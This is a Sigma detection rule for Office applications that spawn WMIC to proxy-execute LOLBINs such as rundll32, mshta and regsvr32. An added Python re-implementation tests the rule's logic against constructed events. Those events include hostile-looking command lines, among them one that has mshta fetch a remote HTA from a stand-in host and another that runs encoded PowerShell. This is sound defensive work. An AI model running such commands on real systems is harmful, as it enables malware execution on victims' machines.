Suspicious WMIC Execution Via Office Process
An Office application called WMIC to proxy execution through a LOLBIN. Attackers use this to break the suspicious parent-child chain (Office app spawns LOLBIN directly): because `wmic process call create` starts the new process through WMI, the LOLBIN's parent becomes the WMI provider host rather than the Office application, so a rule that only looks at direct Office children misses it.
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
detection:
    selection_parent:
        ParentImage|endswith:
            - '\WINWORD.EXE'
            - '\EXCEL.EXE'
            - '\POWERPNT.exe'
            - '\MSPUB.exe'
            - '\VISIO.exe'
            - '\MSACCESS.EXE'
            - '\EQNEDT32.EXE'
            - '\ONENOTE.EXE'
            - '\wordpad.exe'
            - '\wordview.exe'
    selection_wmic_img:
        - Image|endswith: '\wbem\WMIC.exe'
        - OriginalFileName: 'wmic.exe'
    selection_wmic_cli:
        CommandLine|contains|all:
            - 'process'
            - 'create'
            - 'call'
        CommandLine|contains:
            # Add more suspicious LOLBINs as you see fit
            - 'regsvr32'
            - 'rundll32'
            - 'msiexec'
            - 'mshta'
            - 'verclsid'
            - 'wscript'
            - 'cscript'
    condition: all of selection_*

False positive likelihood has not been assessed. Additional context may be needed during triage.
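To show how the three selections combine under `all of selection_*`, here is an added Python re-implementation of the rule logic run over a handful of constructed Sysmon-style process_creation events. This is illustrative code written for this page, not part of the Sigma rule or of any Sigma backend; the event records, file paths and command lines are made up, and string comparison is done case-insensitively, which is how Sigma backends treat `contains` and `endswith` by default.

```python
# Added example: the Sigma rule above, expressed as plain Python predicates
# and evaluated against constructed process_creation events. The field names
# (ParentImage, Image, OriginalFileName, CommandLine) follow the Sysmon
# process_creation schema the rule targets; all values here are made up.

# selection_parent: ParentImage|endswith (values lowercased for
# case-insensitive comparison, matching Sigma's default).
OFFICE_PARENTS = (
    r"\winword.exe", r"\excel.exe", r"\powerpnt.exe", r"\mspub.exe",
    r"\visio.exe", r"\msaccess.exe", r"\eqnedt32.exe", r"\onenote.exe",
    r"\wordpad.exe", r"\wordview.exe",
)

# selection_wmic_cli: CommandLine|contains (the LOLBIN list from the rule).
LOLBINS = ("regsvr32", "rundll32", "msiexec", "mshta", "verclsid", "wscript", "cscript")


def _field(event, name):
    """Return a field lowercased, or '' if the event lacks it."""
    return str(event.get(name, "")).lower()


def selection_parent(event):
    return _field(event, "ParentImage").endswith(OFFICE_PARENTS)


def selection_wmic_img(event):
    # A YAML list of maps is an OR: either the on-disk path ends with
    # \wbem\WMIC.exe, or the PE's OriginalFileName says it is wmic.exe
    # (which catches a renamed copy of the binary).
    return (_field(event, "Image").endswith(r"\wbem\wmic.exe")
            or _field(event, "OriginalFileName") == "wmic.exe")


def selection_wmic_cli(event):
    # Two keys in one map are ANDed: all three keywords must be present
    # (contains|all) AND at least one listed LOLBIN must appear (contains).
    cli = _field(event, "CommandLine")
    return (all(word in cli for word in ("process", "create", "call"))
            and any(lolbin in cli for lolbin in LOLBINS))


def rule_matches(event):
    """condition: all of selection_* -> every selection must be true."""
    return selection_parent(event) and selection_wmic_img(event) and selection_wmic_cli(event)


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": "word-wmic-rundll32",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "OriginalFileName": "wmic.exe",
     "CommandLine": r'wmic process call create "rundll32 C:\Users\Public\upd.dll,Start"'},
    {"id": "excel-wmic-benign-query",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic os get caption"},
    {"id": "explorer-wmic-mshta",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "OriginalFileName": "wmic.exe",
     "CommandLine": r'wmic process call create "mshta http://example.invalid/a.hta"'},
    {"id": "powerpnt-renamed-wmic-cscript",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "Image": r"C:\Users\Public\svc.exe",          # renamed copy of wmic.exe
     "OriginalFileName": "wmic.exe",
     "CommandLine": r'svc.exe process call create "cscript C:\Users\Public\a.vbs"'},
    {"id": "word-wmic-unlisted-child",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "OriginalFileName": "wmic.exe",
     "CommandLine": r'wmic process call create "powershell -enc AAAA"'},
]


def evaluate_sample_events():
    """Return (event id, matched?) for every constructed event."""
    return [(event["id"], rule_matches(event)) for event in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event_id, hit in evaluate_sample_events():
        print(f"{'ALERT ' if hit else 'ignore'}  {event_id}")
```

Two of the constructed events illustrate points worth keeping in mind during tuning: the renamed-binary case is caught only because `OriginalFileName` is checked alongside `Image`, and the last event (Office -> wmic -> powershell) is not flagged because `powershell` is not in the rule's LOLBIN list, which is exactly the gap the `# Add more suspicious LOLBINs as you see fit` comment invites you to close. Case handling also matters: the mixed case in values such as `'\POWERPNT.exe'` only works because the backend compares case-insensitively, so check that the target backend preserves that behaviour.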
Suspicious Microsoft Office Child Process
Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
This rule was derived from the related rule - both detect similar activity with different scope.
518643ba-7d9c-4fa5-9f37-baed36059f6a
9d1c72f5-43f0-4da5-9320-648cf2099dd0
c0e1c3d5-4381-4f18-8145-2583f06a1fe5
04f5363a-6bca-42ff-be70-0d28bf629ead